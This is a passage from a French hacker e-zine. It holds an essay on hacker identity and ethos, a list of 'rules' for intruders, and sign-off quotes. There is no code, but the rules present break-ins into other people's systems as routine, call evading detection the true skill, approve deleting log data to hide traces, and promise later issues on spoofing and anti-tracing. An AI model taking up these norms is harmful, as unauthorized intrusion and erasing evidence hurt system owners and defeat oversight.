c'est à dire les pionniers de l'informatique qui ont colaborés à la construction d'Arpanet, qui ont créé le système UNIX et qui l'on fait devenir ce qu'il est aujourd'hui... En fait l'essence même du Web, les gens qui le font tourner sont des hackers. Et si ces mêmes personnes (non non pas Zipiz), vous reconnaissent comme tel, alors vous êtes un hacker. On ne s'autoproclamme pas hacker. C'est cette même communauté, par le respect qu'elle vous porte ou non qui déterminera si vous êtes ou non un hacker. Un hacker d'ailleurs, n'est pas forcémment un crack de la programmation. En fait c'est l'état d'esprit, la capacité à apprendre et le déterminisme qui font d'un simple mortel un hacker. Ainsi il peut y avoir des hackers dans l'électronique... ou autre chose. C'est vrai que le hacker est parfois considéré comme une sorte d'autiste, car il ne fait guère cas de ce qui est le plus important pour le reste du monde. Ce qui l'importe c'est surtout de progresser dans son art. Le hacker développe toutes ces facultés à une vitesse extraordinaire. S'il ne connait pas quelque chose il va développer sa faculté d'aprentissage jusqu'à son paroxysme, afin de connaître par coeur le sujet qu'il l'interesse. Un hacker n'abandonne jamais ! S'il a décidé de réalisé quelque chose, il le fera jusqu'au bout. Et si c'est impossible (mot rayé du vocabulaire de base du hacker), il trouvera un moyen équivalent ou se rapprochera le plus qu'il est possible de son but. Quelqu'un qui n'a pas cette mentalité ne sera jamais un hacker, même s'il connait par coeur toutes les bibles de programmation du monde... Un hacker à aussi l'état d'esprit qui était celui des débuts d'Internet : Le partage de l'information. Un hacker partage ses découvertes avec les autres afins que ceux-ci puissent avancer plus vite et prends lui même les information que les autres ont trouvé, qui pourrait l'aider dans ses recherches. Bien qui lui arrive de garder quelques petits trucs secret, il en divuguera toujours l'essence pour que ceux qui sont à même de comprendre puisse facilement découvrir des techniques équivalentes. Les hackers défient également toute forme d'autorité : en effet une autorité quelconque, peut se révéler un barage à sa créativité et sa soif de connaissance ce qui est tout à fait inacceptable pour un hacker. C'est pour cela qu'on a souvent tendance à traiter les hackers d'anarchistes. Les hackers n'aiment donc pas les boeufs... Ceux qui bêtement suivent la masse ni ceux d'ailleurs qui essaient de la contrôler. Il a une aversion pour tout ce qui est secret car le secret est le plus grand des barages à la connaissance. Et quoi qu'il lui arrive il restera sur cette position même si sa vie se trouve menacée. Vous ne trouverez nulle part de bible qui vous expliquera comment devenir un hacker. Si vous en êtes un ou en avez la trempe, vous le saurez en sentant cette exitation lorsque vous inventez, lorsque les lignez de codes incompréhensible pour votre prof d'algo défileront devant vous... Installer un Unix libre tel Linux est un très bon début. Les codes sources étants fournis, il vous sera facile d'étudier le fonctionnement des divers programmes afin d'améliorer votre technique. Vous ne pourrez pas être un hacker sans comprendre le fonctionnement d'unix car internet repose sur ces systèmes d'exploitation. Enfin participer à l'evolution du mileu dit "underground" en apportant vos correctifs et amélioration à des sources existant, vos propres créations, textes, opinions... Tout cela est aussi une partie de la vie du hacker. Sachez aussi que vous devrez sacrifier beaucoup de choses (vis à vis des autres) pour en arriver à ce niveau... Si vous sentez un hacker qui sommeille en vous, si vous n'abandonnez jamais vos projets, vos idéal alors lancez vous dans l'aventure... Vous ne le regretterez pas... #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ XI] Les règles à respecter. Quand on est un hacker (ou que l'on souhaite le devenir) il y a quelques règles de base à respecter... Ces quelques règles ont été rappelez mille fois et j'espère que d'autres penseront à le faire assez régulièrement. Certains croient en effet que pénétrer un système ultra-sécurisé fait de vous un des meilleurs hackers.. Or c'est totalement faux. Pénétrer de gros systèmes n'est pas aussi compliqué qu'on veut vous le faire croire. Ainsi de grandes institutions dont je ne citerai pas le nom, sont de véritables gruyères ! Non le plus dur n'est pas de rentrer... c'est de ne pas se faire prendre !!!. Si on veut de la renommée c'est facile vous vous attaquez ouvertement à un gros systèmes et un quart d'heure après vous vous faites interpeler. Vous prenez un pseudo qui en jette genre Brain Override, Dark Angel, Digital Squad ou encore illegal et vous passerez à la télé pour un super génie, alors que vous n'êtes qu'une grosse BURNE !! Et oui tout l'art d'un vrai hacker consiste à ne pas se faire détecter. Nous aborderons d'ailleurs ce problème dans le C.H.G. 3 ou 4 où toutes les techniques d'occultation, spoofinganti-traçage, effacement de ses traces dans les logs, etc... seront passés au crible. Bon passons au reste. Vous ne devez en aucun cas, (sauf pour effacer vos traces) détruire des données quel quelles soient sur le système que vous pénétrez. Traitez cette machine comme la votre et laissez tout tel quel pour que les gars n'est pas à se retaper toutes ses sauvegardes !! Avertissez ensuite l'administrateur de le faille présente sur son système et mettez le sur la voie pour qu'il puisse trouver ou fabriquer le correctif approprié. Certains ne seront peut être pas très polis, pour ce qui est du reste, vous pouvez vous faire des amis qui pourront un jour vous être utile. Enfin lorsque vous trouvez une brèche, dans un programme ou un OS qui n'est pas connue, avertissez la communauté! Il y a des listes de diffusion comme BUGTRAQ qui permettront de mettre le maximum de gens au courant afin qu'un correctif soit le plus vite disponible. #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ C'est ainsi que ce second numéro se termine. Pour le prochain mag, On va vous préparer quelques exclusivités... assez spéciales.. Bon je tiens à remercier mon ami Digital Squad qui va vous préparer quelques articles pour le prochain numéro, Ma copine, pour sa patience et son aide quand je comprends plus mon propre code. Ah.. oui et mort aux cons !! ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ "Consommer de la cafeine de facon abusive peut vous faire devenir l33T" #PsYkAoS# It's nice to be important, il's more important to be nice. Hack The best, Fuck the rest ! #Maddchat# l'expérience est comme une lanterne accroché dans le dos de quelqu'un elle n'éclaire que le passé ;) #GENOCYD# "Un jour la France sera démocratique. On peut toujours rêver..." #peace&love# "La chance accorde ses faveurs aux esprits avertis" #Brain.Override# "T'inquiete ça va marcher, fais moi confiance" #Digital Squad" "Mort aux cons" #Hagen#